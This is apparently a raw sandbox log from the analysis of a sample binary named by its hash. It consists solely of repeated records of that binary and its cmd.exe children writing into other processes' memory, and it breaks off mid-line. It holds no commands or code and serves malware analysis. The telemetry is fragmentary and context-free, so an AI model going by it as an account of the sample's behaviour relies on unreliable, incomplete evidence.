PID 904 wrote to memory of 1216 904 cmd.exe 775 PID 904 wrote to memory of 1216 904 cmd.exe 775 PID 904 wrote to memory of 1216 904 cmd.exe 775 PID 904 wrote to memory of 1572 904 cmd.exe 776 PID 904 wrote to memory of 1572 904 cmd.exe 776 PID 904 wrote to memory of 1572 904 cmd.exe 776 PID 904 wrote to memory of 1572 904 cmd.exe 776 PID 904 wrote to memory of 1652 904 cmd.exe 777 PID 904 wrote to memory of 1652 904 cmd.exe 777 PID 904 wrote to memory of 1652 904 cmd.exe 777 PID 904 wrote to memory of 1652 904 cmd.exe 777 PID 1652 wrote to memory of 1488 1652 cmd.exe 778 PID 1652 wrote to memory of 1488 1652 cmd.exe 778 PID 1652 wrote to memory of 1488 1652 cmd.exe 778 PID 1652 wrote to memory of 1488 1652 cmd.exe 778 PID 904 wrote to memory of 204 904 cmd.exe 779 PID 904 wrote to memory of 204 904 cmd.exe 779 PID 904 wrote to memory of 204 904 cmd.exe 779 PID 904 wrote to memory of 204 904 cmd.exe 779 PID 672 wrote to memory of 1836 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 780 PID 672 wrote to memory of 1836 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 780 PID 672 wrote to memory of 1836 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 780 PID 672 wrote to memory of 1836 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 780 PID 1836 wrote to memory of 1068 1836 cmd.exe 782 PID 1836 wrote to memory of 1068 1836 cmd.exe 782 PID 1836 wrote to memory of 1068 1836 cmd.exe 782 PID 1836 wrote to memory of 1068 1836 cmd.exe 782 PID 1836 wrote to memory of 212 1836 cmd.exe 783 PID 1836 wrote to memory of 212 1836 cmd.exe 783 PID 1836 wrote to memory of 212 1836 cmd.exe 783 PID 1836 wrote to memory of 212 1836 cmd.exe 783 PID 1836 wrote to memory of 1220 1836 cmd.exe 784 PID 1836 wrote to memory of 1220 1836 cmd.exe 784 PID 1836 wrote to memory of 1220 1836 cmd.exe 784 PID 1836 wrote to memory of 1220 1836 cmd.exe 784 PID 1220 wrote to memory of 1828 1220 cmd.exe 785 PID 1220 wrote to memory of 1828 1220 cmd.exe 785 PID 1220 wrote to memory of 1828 1220 cmd.exe 785 PID 1220 wrote to memory of 1828 1220 cmd.exe 785 PID 1836 wrote to memory of 1080 1836 cmd.exe 786 PID 1836 wrote to memory of 1080 1836 cmd.exe 786 PID 1836 wrote to memory of 1080 1836 cmd.exe 786 PID 1836 wrote to memory of 1080 1836 cmd.exe 786 PID 672 wrote to memory of 1496 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 787 PID 672 wrote to memory of 1496 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 787 PID 672 wrote to memory of 1496 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 787 PID 672 wrote to memory of 1496 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 787 PID 1496 wrote to memory of 744 1496 cmd.exe 789 PID 1496 wrote to memory of 744 1496 cmd.exe 789 PID 1496 wrote to memory of 744 1496 cmd.exe 789 PID 1496 wrote to memory of 744 1496 cmd.exe 789 PID 1496 wrote to memory of 2044 1496 cmd.exe 790 PID 1496 wrote to memory of 2044 1496 cmd.exe 790 PID 1496 wrote to memory of 2044 1496 cmd.exe 790 PID 1496 wrote to memory of 2044 1496 cmd.exe 790 PID 1496 wrote to memory of 1552 1496 cmd.exe 791 PID 1496 wrote to memory of 1552 1496 cmd.exe 791 PID 1496 wrote to memory of 1552 1496 cmd.exe 791 PID 1496 wrote to memory of 1552 1496 cmd.exe 791 PID 1552 wrote to memory of 1644 1552 cmd.exe 792 PID 1552 wrote to memory of 1644 1552 cmd.exe 792 PID 1552 wrote to memory of 1644 1552 cmd.exe 792 PID 1552 wrote to memory of 1644 1552 cmd.exe 792 PID 1496 wrote to memory of 948 1496 cmd.exe 793 PID 1496 wrote to memory of 948 1496 cmd.exe 793 PID 1496 wrote to memory of 948 1496 cmd.exe 793 PID 1496 wrote to memory of 948 1496 cmd.exe 793 PID 672 wrote to memory of 760 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 794 PID 672 wrote to memory of 760 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 794 PID 672 wrote to memory of 760 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 794 PID 672 wrote to memory of 760 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 794 PID 760 wrote to memory of 280 760 cmd.exe 796 PID 760 wrote to memory of 280 760 cmd.exe 796 PID 760 wrote to memory of 280 760 cmd.exe 796 PID 760 wrote to memory of 280 760 cmd.exe 796 PID 760 wrote to memory of 1576 760 cmd.exe 797 PID 760 wrote to memory of 1576 760 cmd.exe 797 PID 760 wrote to memory of 1576 760 cmd.exe 797 PID 760 wrote to memory of 1576 760 cmd.exe 797 PID 760 wrote to memory of 364 760 cmd.exe 798 PID 760 wrote to memory of 364 760 cmd.exe 798 PID 760 wrote to memory of 364 760 cmd.exe 798 PID 760 wrote to memory of 364 760 cmd.exe 798 PID 364 wrote to memory of 904 364 cmd.exe 799 PID 364 wrote to memory of 904 364 cmd.exe 799 PID 364 wrote to memory of 904 364 cmd.exe 799 PID 364 wrote to memory of 904 364 cmd.exe 799 PID 760 wrote to memory of 236 760 cmd.exe 800 PID 760 wrote to memory of 236 760 cmd.exe 800 PID 760 wrote to memory of 236 760 cmd.exe 800 PID 760 wrote to memory of 236 760 cmd.exe 800 PID 672 wrote to memory of 548 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 801 PID 672 wrote to memory of 548 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 801 PID 672 wrote to memory of 548 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 801 PID 672 wrote to memory of 548 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 801 PID 548 wrote to memory of 1828 548 cmd.exe 803 PID 548 wrote to memory of 1828 548 cmd.exe 803 PID 548 wrote to memory of 1828 548 cmd.exe 803 PID 548 wrote to memory of 1828 548 cmd.exe 803 PID 548 wrote to memory of 1180 548 cmd.exe 804 PID 548 wrote to memory of 1180 548 cmd.exe 804 PID 548 wrote to memory of 1180 548 cmd.exe 804 PID 548 wrote to memory of 1180 548 cmd.exe 804 PID 548 wrote to memory of 1080 548 cmd.exe 805 PID 548 wrote to memory of 1080 548 cmd.exe 805 PID 548 wrote to memory of 1080 548 cmd.exe 805 PID 548 wrote to memory of 1080 548 cmd.exe 805 PID 1080 wrote to memory of 1836 1080 cmd.exe 806 PID 1080 wrote to memory of 1836 1080 cmd.exe 806 PID 1080 wrote to memory of 1836 1080 cmd.exe 806 PID 1080 wrote to memory of 1836 1080 cmd.exe 806 PID 548 wrote to memory of 1920 548 cmd.exe 807 PID 548 wrote to memory of 1920 548 cmd.exe 807 PID 548 wrote to memory of 1920 548 cmd.exe 807 PID 548 wrote to memory of 1920 548 cmd.exe 807 PID 672 wrote to memory of 676 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 808 PID 672 wrote to memory of 676 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 808 PID 672 wrote to memory of 676 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 808 PID 672 wrote to memory of 676 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 808 PID 676 wrote to memory of 1644 676 cmd.exe 810 PID 676 wrote to memory of 1644 676 cmd.exe 810 PID 676 wrote to memory of 1644 676 cmd.exe 810 PID 676 wrote to memory of 1644 676 cmd.exe 810 PID 676 wrote to memory of 1216 676 cmd.exe 811 PID 676 wrote to memory of 1216 676 cmd.exe 811 PID 676 wrote to memory of 1216 676 cmd.exe 811 PID 676 wrote to memory of 1216 676 cmd.exe 811 PID 676 wrote to memory of 948 676 cmd.exe 812 PID 676 wrote to memory of 948 676 cmd.exe 812 PID 676 wrote to memory of 948 676 cmd.exe 812 PID 676 wrote to memory of 948 676 cmd.exe 812 PID 948 wrote to memory of 228 948 cmd.exe 813 PID 948 wrote to memory of 228 948 cmd.exe 813 PID 948 wrote to memory of 228 948 cmd.exe 813 PID 948 wrote to memory of 228 948 cmd.exe 813 PID 676 wrote to memory of 1652 676 cmd.exe 814 PID 676 wrote to memory of 1652 676 cmd.exe 814 PID 676 wrote to memory of 1652 676 cmd.exe 814 PID 676 wrote to memory of 1652 676 cmd.exe 814 PID 672 wrote to memory of 964 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 815 PID 672 wrote to memory of 964 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 815 PID 672 wrote to memory of 964 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 815 PID 672 wrote to memory of 964 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 815 PID 964 wrote to memory of 904 964 cmd.exe 817 PID 964 wrote to memory of 904 964 cmd.exe 817 PID 964 wrote to memory of 904 964 cmd.exe 817 PID 964 wrote to memory of 904 964 cmd.exe 817 PID 964 wrote to memory of 1472 964 cmd.exe 818 PID 964 wrote to memory of 1472 964 cmd.exe 818 PID 964 wrote to memory of 1472 964 cmd.exe 818 PID 964 wrote to memory of 1472 964 cmd.exe 818 PID 964 wrote to memory of 236 964 cmd.exe 819 PID 964 wrote to memory of 236 964 cmd.exe 819 PID 964 wrote to memory of 236 964 cmd.exe 819 PID 964 wrote to memory of 236 964 cmd.exe 819 PID 236 wrote to memory of 1240 236 cmd.exe 820 PID 236 wrote to memory of 1240 236 cmd.exe 820 PID 236 wrote to memory of 1240 236 cmd.exe 820 PID 236 wrote to memory of 1240 236 cmd.exe 820 PID 964 wrote to memory of 1220 964 cmd.exe 821 PID 964 wrote to memory of 1220 964 cmd.exe 821 PID 964 wrote to memory of 1220 964 cmd.exe 821 PID 964 wrote to memory of 1220 964 cmd.exe 821 PID 672 wrote to memory of 1052 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 822 PID 672 wrote to memory of 1052 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 822 PID 672 wrote to memory of 1052 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 822 PID 672 wrote to memory of 1052 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 822 PID 1052 wrote to memory of 1836 1052 cmd.exe 824 PID 1052 wrote to memory of 1836 1052 cmd.exe 824 PID 1052 wrote to memory of 1836 1052 cmd.exe 824 PID 1052 wrote to memory of 1836 1052 cmd.exe 824 PID 1052 wrote to memory of 744 1052 cmd.exe 825 PID 1052 wrote to memory of 744 1052 cmd.exe 825 PID 1052 wrote to memory of 744 1052 cmd.exe 825 PID 1052 wrote to memory of 744 1052 cmd.exe 825 PID 1052 wrote to memory of 952 1052 cmd.exe 826 PID 1052 wrote to memory of 952 1052 cmd.exe 826 PID 1052 wrote to memory of 952 1052 cmd.exe 826 PID 1052 wrote to memory of 952 1052 cmd.exe 826 PID 952 wrote to memory of 1064 952 cmd.exe 827 PID 952 wrote to memory of 1064 952 cmd.exe 827 PID 952 wrote to memory of 1064 952 cmd.exe 827 PID 952 wrote to memory of 1064 952 cmd.exe 827 PID 1052 wrote to memory of 1552 1052 cmd.exe 828 PID 1052 wrote to memory of 1552 1052 cmd.exe 828 PID 1052 wrote to memory of 1552 1052 cmd.exe 828 PID 1052 wrote to memory of 1552 1052 cmd.exe 828 PID 672 wrote to memory of 1368 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 829 PID 672 wrote to memory of 1368 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 829 PID 672 wrote to memory of 1368 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 829 PID 672 wrote to memory of 1368 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 829 PID 1368 wrote to memory of 228 1368 cmd.exe 831 PID 1368 wrote to memory of 228 1368 cmd.exe 831 PID 1368 wrote to memory of 228 1368 cmd.exe 831 PID 1368 wrote to memory of 228 1368 cmd.exe 831 PID 1368 wrote to memory of 280 1368 cmd.exe 832 PID 1368 wrote to memory of 280 1368 cmd.exe 832 PID 1368 wrote to memory of 280 1368 cmd.exe 832 PID 1368 wrote to memory of 280 1368 cmd.exe 832 PID 1368 wrote to memory of 1652 1368 cmd.exe 833 PID 1368 wrote to memory of 1652 1368 cmd.exe 833 PID 1368 wrote to memory of 1652 1368 cmd.exe 833 PID 1368 wrote to memory of 1652 1368 cmd.exe 833 PID 1652 wrote to memory of 676 1652 cmd.exe 834 PID 1652 wrote to memory of 676 1652 cmd.exe 834 PID 1652 wrote to memory of 676 1652 cmd.exe 834 PID 1652 wrote to memory of 676 1652 cmd.exe 834 PID 1368 wrote to memory of 364 1368 cmd.exe 835 PID 1368 wrote to memory of 364 1368 cmd.exe 835 PID 1368 wrote to memory of 364 1368 cmd.exe 835 PID 1368 wrote to memory of 364 1368 cmd.exe 835 PID 672 wrote to memory of 1224 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 836 PID 672 wrote to memory of 1224 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 836 PID 672 wrote to memory of 1224 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 836 PID 672 wrote to memory of 1224 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 836 PID 1224 wrote to memory of 1240 1224 cmd.exe 838 PID 1224 wrote to memory of 1240 1224 cmd.exe 838 PID 1224 wrote to memory of 1240 1224 cmd.exe 838 PID 1224 wrote to memory of 1240 1224 cmd.exe 838 PID 1224 wrote to memory of 568 1224 cmd.exe 839 PID 1224 wrote to memory of 568 1224 cmd.exe 839 PID 1224 wrote to memory of 568 1224 cmd.exe 839 PID 1224 wrote to memory of 568 1224 cmd.exe 839 PID 1224 wrote to memory of 1220 1224 cmd.exe 840 PID 1224 wrote to memory of 1220 1224 cmd.exe 840 PID 1224 wrote to memory of 1220 1224 cmd.exe 840 PID 1224 wrote to memory of 1220 1224 cmd.exe 840 PID 1220 wrote to memory of 964 1220 cmd.exe 841 PID 1220 wrote to memory of 964 1220 cmd.exe 841 PID 1220 wrote to memory of 964 1220 cmd.exe 841 PID 1220 wrote to memory of 964 1220 cmd.exe 841 PID 1224 wrote to memory of 1080 1224 cmd.exe 842 PID 1224 wrote to memory of 1080 1224 cmd.exe 842 PID 1224 wrote to memory of 1080 1224 cmd.exe 842 PID 1224 wrote to memory of 1080 1224 cmd.exe 842 PID 672 wrote to memory of 216 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 843 PID 672 wrote to memory of 216 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 843 PID 672 wrote to memory of 216 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 843 PID 672 wrote to memory of 216 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 843 PID 216 wrote to memory of 1064 216 cmd.exe 845 PID 216 wrote to memory of 1064 216 cmd.exe 845 PID 216 wrote to memory of 1064 216 cmd.exe 845 PID 216 wrote to memory of 1064 216 cmd.exe 845 PID 216 wrote to memory of 232 216 cmd.exe 846 PID 216 wrote to memory of 232 216 cmd.exe 846 PID 216 wrote to memory of 232 216 cmd.exe 846 PID 216 wrote to memory of 232 216 cmd.exe 846 PID 216 wrote to memory of 1552 216 cmd.exe 847 PID 216 wrote to memory of 1552 216 cmd.exe 847 PID 216 wrote to memory of 1552 216 cmd.exe 847 PID 216 wrote to memory of 1552 216 cmd.exe 847 PID 1552 wrote to memory of 1052 1552 cmd.exe 848 PID 1552 wrote to memory of 1052 1552 cmd.exe 848 PID 1552 wrote to memory of 1052 1552 cmd.exe 848 PID 1552 wrote to memory of 1052 1552 cmd.exe 848 PID 216 wrote to memory of 948 216 cmd.exe 849 PID 216 wrote to memory of 948 216 cmd.exe 849 PID 216 wrote to memory of 948 216 cmd.exe 849 PID 216 wrote to memory of 948 216 cmd.exe 849 PID 672 wrote to memory of 204 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 850 PID 672 wrote to memory of 204 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 850 PID 672 wrote to memory of 204 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 850 PID 672 wrote to memory of 204 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 850 PID 204 wrote to memory of 676 204 cmd.exe 852 PID 204 wrote to memory of 676 204 cmd.exe 852 PID 204 wrote to memory of 676 204 cmd.exe 852 PID 204 wrote to memory of 676 204 cmd.exe 852 PID 204 wrote to memory of 1068 204 cmd.exe 853 PID 204 wrote to memory of 1068 204 cmd.exe 853 PID 204 wrote to memory of 1068 204 cmd.exe 853 PID 204 wrote to memory of 1068 204 cmd.exe 853 PID 204 wrote to memory of 1216 204 cmd.exe 854 PID 204 wrote to memory of 1216 204 cmd.exe 854 PID 204 wrote to memory of 1216 204 cmd.exe 854 PID 204 wrote to memory of 1216 204 cmd.exe 854 PID 1216 wrote to memory of 1968 1216 cmd.exe 855 PID 1216 wrote to memory of 1968 1216 cmd.exe 855 PID 1216 wrote to memory of 1968 1216 cmd.exe 855 PID 1216 wrote to memory of 1968 1216 cmd.exe 855 PID 204 wrote to memory of 1828 204 cmd.exe 856 PID 204 wrote to memory of 1828 204 cmd.exe 856 PID 204 wrote to memory of 1828 204 cmd.exe 856 PID 204 wrote to memory of 1828 204 cmd.exe 856 PID 672 wrote to memory of 568 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 857 PID 672 wrote to memory of 568 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 857 PID 672 wrote to memory of 568 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 857 PID 672 wrote to memory of 568 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 857 PID 568 wrote to memory of 1956 568 cmd.exe 859 PID 568 wrote to memory of 1956 568 cmd.exe 859 PID 568 wrote to memory of 1956 568 cmd.exe 859 PID 568 wrote to memory of 1956 568 cmd.exe 859 PID 568 wrote to memory of 1920 568 cmd.exe 860 PID 568 wrote to memory of 1920 568 cmd.exe 860 PID 568 wrote to memory of 1920 568 cmd.exe 860 PID 568 wrote to memory of 1920 568 cmd.exe 860 PID 568 wrote to memory of 1572 568 cmd.exe 861 PID 568 wrote to memory of 1572 568 cmd.exe 861 PID 568 wrote to memory of 1572 568 cmd.exe 861 PID 568 wrote to memory of 1572 568 cmd.exe 861 PID 1572 wrote to memory of 524 1572 cmd.exe 862 PID 1572 wrote to memory of 524 1572 cmd.exe 862 PID 1572 wrote to memory of 524 1572 cmd.exe 862 PID 1572 wrote to memory of 524 1572 cmd.exe 862 PID 568 wrote to memory of 212 568 cmd.exe 863 PID 568 wrote to memory of 212 568 cmd.exe 863 PID 568 wrote to memory of 212 568 cmd.exe 863 PID 568 wrote to memory of 212 568 cmd.exe 863 PID 672 wrote to memory of 232 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 864 PID 672 wrote to memory of 232 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 864 PID 672 wrote to memory of 232 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 864 PID 672 wrote to memory of 232 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 864 PID 232 wrote to memory of 1180 232 cmd.exe 866 PID 232 wrote to memory of 1180 232 cmd.exe 866 PID 232 wrote to memory of 1180 232 cmd.exe 866 PID 232 wrote to memory of 1180 232 cmd.exe 866 PID 232 wrote to memory of 908 232 cmd.exe 867 PID 232 wrote to memory of 908 232 cmd.exe 867 PID 232 wrote to memory of 908 232 cmd.exe 867 PID 232 wrote to memory of 908 232 cmd.exe 867 PID 232 wrote to memory of 744 232 cmd.exe 868 PID 232 wrote to memory of 744 232 cmd.exe 868 PID 232 wrote to memory of 744 232 cmd.exe 868 PID 232 wrote to memory of 744 232 cmd.exe 868 PID 744 wrote to memory of 220 744 cmd.exe 869 PID 744 wrote to memory of 220 744 cmd.exe 869 PID 744 wrote to memory of 220 744 cmd.exe 869 PID 744 wrote to memory of 220 744 cmd.exe 869 PID 232 wrote to memory of 904 232 cmd.exe 870 PID 232 wrote to memory of 904 232 cmd.exe 870 PID 232 wrote to memory of 904 232 cmd.exe 870 PID 232 wrote to memory of 904 232 cmd.exe 870 PID 672 wrote to memory of 992 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 871 PID 672 wrote to memory of 992 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 871 PID 672 wrote to memory of 992 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 871 PID 672 wrote to memory of 992 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 871 PID 992 wrote to memory of 1968 992 cmd.exe 873 PID 992 wrote to memory of 1968 992 cmd.exe 873 PID 992 wrote to memory of 1968 992 cmd.exe 873 PID 992 wrote to memory of 1968 992 cmd.exe 873 PID 992 wrote to memory of 1240 992 cmd.exe 874 PID 992 wrote to memory of 1240 992 cmd.exe 874 PID 992 wrote to memory of 1240 992 cmd.exe 874 PID 992 wrote to memory of 1240 992 cmd.exe 874 PID 992 wrote to memory of 1828 992 cmd.exe 875 PID 992 wrote to memory of 1828 992 cmd.exe 875 PID 992 wrote to memory of 1828 992 cmd.exe 875 PID 992 wrote to memory of 1828 992 cmd.exe 875 PID 1828 wrote to memory of 1948 1828 cmd.exe 876 PID 1828 wrote to memory of 1948 1828 cmd.exe 876 PID 1828 wrote to memory of 1948 1828 cmd.exe 876 PID 1828 wrote to memory of 1948 1828 cmd.exe 876 PID 992 wrote to memory of 1848 992 cmd.exe 877 PID 992 wrote to memory of 1848 992 cmd.exe 877 PID 992 wrote to memory of 1848 992 cmd.exe 877 PID 992 wrote to memory of 1848 992 cmd.exe 877 PID 672 wrote to memory of 544 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 878 PID 672 wrote to memory of 544 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 878 PID 672 wrote to memory of 544 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 878 PID 672 wrote to memory of 544 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 878 PID 544 wrote to memory of 524 544 cmd.exe 880 PID 544 wrote to memory of 524 544 cmd.exe 880 PID 544 wrote to memory of 524 544 cmd.exe 880 PID 544 wrote to memory of 524 544 cmd.exe 880 PID 544 wrote to memory of 1752 544 cmd.exe 881 PID 544 wrote to memory of 1752 544 cmd.exe 881 PID 544 wrote to memory of 1752 544 cmd.exe 881 PID 544 wrote to memory of 1752 544 cmd.exe 881 PID 544 wrote to memory of 212 544 cmd.exe 882 PID 544 wrote to memory of 212 544 cmd.exe 882 PID 544 wrote to memory of 212 544 cmd.exe 882 PID 544 wrote to memory of 212 544 cmd.exe 882 PID 212 wrote to memory of 568 212 cmd.exe 883 PID 212 wrote to memory of 568 212 cmd.exe 883 PID 212 wrote to memory of 568 212 cmd.exe 883 PID 212 wrote to memory of 568 212 cmd.exe 883 PID 544 wrote to memory of 1488 544 cmd.exe 884 PID 544 wrote to memory of 1488 544 cmd.exe 884 PID 544 wrote to memory of 1488 544 cmd.exe 884 PID 544 wrote to memory of 1488 544 cmd.exe 884 PID 672 wrote to memory of 948 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 885 PID 672 wrote to memory of 948 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 885 PID 672 wrote to memory of 948 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 885 PID 672 wrote to memory of 948 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 885 PID 948 wrote to memory of 744 948 cmd.exe 887 PID 948 wrote to memory of 744 948 cmd.exe 887 PID 948 wrote to memory of 744 948 cmd.exe 887 PID 948 wrote to memory of 744 948 cmd.exe 887 PID 948 wrote to memory of 676 948 cmd.exe 888 PID 948 wrote to memory of 676 948 cmd.exe 888 PID 948 wrote to memory of 676 948 cmd.exe 888 PID 948 wrote to memory of 676 948 cmd.exe 888 PID 948 wrote to memory of 904 948 cmd.exe 889 PID 948 wrote to memory of 904 948 cmd.exe 889 PID 948 wrote to memory of 904 948 cmd.exe 889 PID 948 wrote to memory of 904 948 cmd.exe 889 PID 904 wrote to memory of 232 904 cmd.exe 890 PID 904 wrote to memory of 232 904 cmd.exe 890 PID 904 wrote to memory of 232 904 cmd.exe 890 PID 904 wrote to memory of 232 904 cmd.exe 890 PID 948 wrote to memory of 1216 948 cmd.exe 891 PID 948 wrote to memory of 1216 948 cmd.exe 891 PID 948 wrote to memory of 1216 948 cmd.exe 891 PID 948 wrote to memory of 1216 948 cmd.exe 891 PID 672 wrote to memory of 320 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 892 PID 672 wrote to memory of 320 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 892 PID 672 wrote to memory of 320 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 892 PID 672 wrote to memory of 320 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 892 PID 320 wrote to memory of 1948 320 cmd.exe 894 PID 320 wrote to memory of 1948 320 cmd.exe 894 PID 320 wrote to memory of 1948 320 cmd.exe 894 PID 320 wrote to memory of 1948 320 cmd.exe 894 PID 320 wrote to memory of 1836 320 cmd.exe 895 PID 320 wrote to memory of 1836 320 cmd.exe 895 PID 320 wrote to memory of 1836 320 cmd.exe 895 PID 320 wrote to memory of 1836 320 cmd.exe 895 PID 320 wrote to memory of 236 320 cmd.exe 896 PID 320 wrote to memory of 236 320 cmd.exe 896 PID 320 wrote to memory of 236 320 cmd.exe 896 PID 320 wrote to memory of 236 320 cmd.exe 896 PID 236 wrote to memory of 1068 236 cmd.exe 897 PID 236 wrote to memory of 1068 236 cmd.exe 897 PID 236 wrote to memory of 1068 236 cmd.exe 897 PID 236 wrote to memory of 1068 236 cmd.exe 897 PID 320 wrote to memory of 1064 320 cmd.exe 898 PID 320 wrote to memory of 1064 320 cmd.exe 898 PID 320 wrote to memory of 1064 320 cmd.exe 898 PID 320 wrote to memory of 1064 320 cmd.exe 898 PID 672 wrote to memory of 1752 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 899 PID 672 wrote to memory of 1752 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 899 PID 672 wrote to memory of 1752 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 899 PID 672 wrote to memory of 1752 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 899 PID 1752 wrote to memory of 964 1752 cmd.exe 901 PID 1752 wrote to memory of 964 1752 cmd.exe 901 PID 1752 wrote to memory of 964 1752 cmd.exe 901 PID 1752 wrote to memory of 964 1752 cmd.exe 901 PID 1752 wrote to memory of 360 1752 cmd.exe 902 PID 1752 wrote to memory of 360 1752 cmd.exe 902 PID 1752 wrote to memory of 360 1752 cmd.exe 902 PID 1752 wrote to memory of 360 1752 cmd.exe 902 PID 1752 wrote to memory of 1960 1752 cmd.exe 903 PID 1752 wrote to memory of 1960 1752 cmd.exe 903 PID 1752 wrote to memory of 1960 1752 cmd.exe 903 PID 1752 wrote to memory of 1960 1752 cmd.exe 903 PID 1960 wrote to memory of 952 1960 cmd.exe 904 PID 1960 wrote to memory of 952 1960 cmd.exe 904 PID 1960 wrote to memory of 952 1960 cmd.exe 904 PID 1960 wrote to memory of 952 1960 cmd.exe 904 PID 1752 wrote to memory of 364 1752 cmd.exe 905 PID 1752 wrote to memory of 364 1752 cmd.exe 905 PID 1752 wrote to memory of 364 1752 cmd.exe 905 PID 1752 wrote to memory of 364 1752 cmd.exe 905 PID 672 wrote to memory of 676 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 906 PID 672 wrote to memory of 676 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 906 PID 672 wrote to memory of 676 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 906 PID 672 wrote to memory of 676 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 906 PID 676 wrote to memory of 592 676 cmd.exe 908 PID 676 wrote to memory of 592 676 cmd.exe 908 PID 676 wrote to memory of 592 676 cmd.exe 908 PID 676 wrote to memory of 592 676 cmd.exe 908 PID 676 wrote to memory of 700 676 cmd.exe 909 PID 676 wrote to memory of 700 676 cmd.exe 909 PID 676 wrote to memory of 700 676 cmd.exe 909 PID 676 wrote to memory of 700 676 cmd.exe 909 PID 676 wrote to memory of 216 676 cmd.exe 910 PID 676 wrote to memory of 216 676 cmd.exe 910 PID 676 wrote to memory of 216 676 cmd.exe 910 PID 676 wrote to memory of 216 676 cmd.exe 910 PID 216 wrote to memory of 948 216 cmd.exe 911 PID 216 wrote to memory of 948 216 cmd.exe 911 PID 216 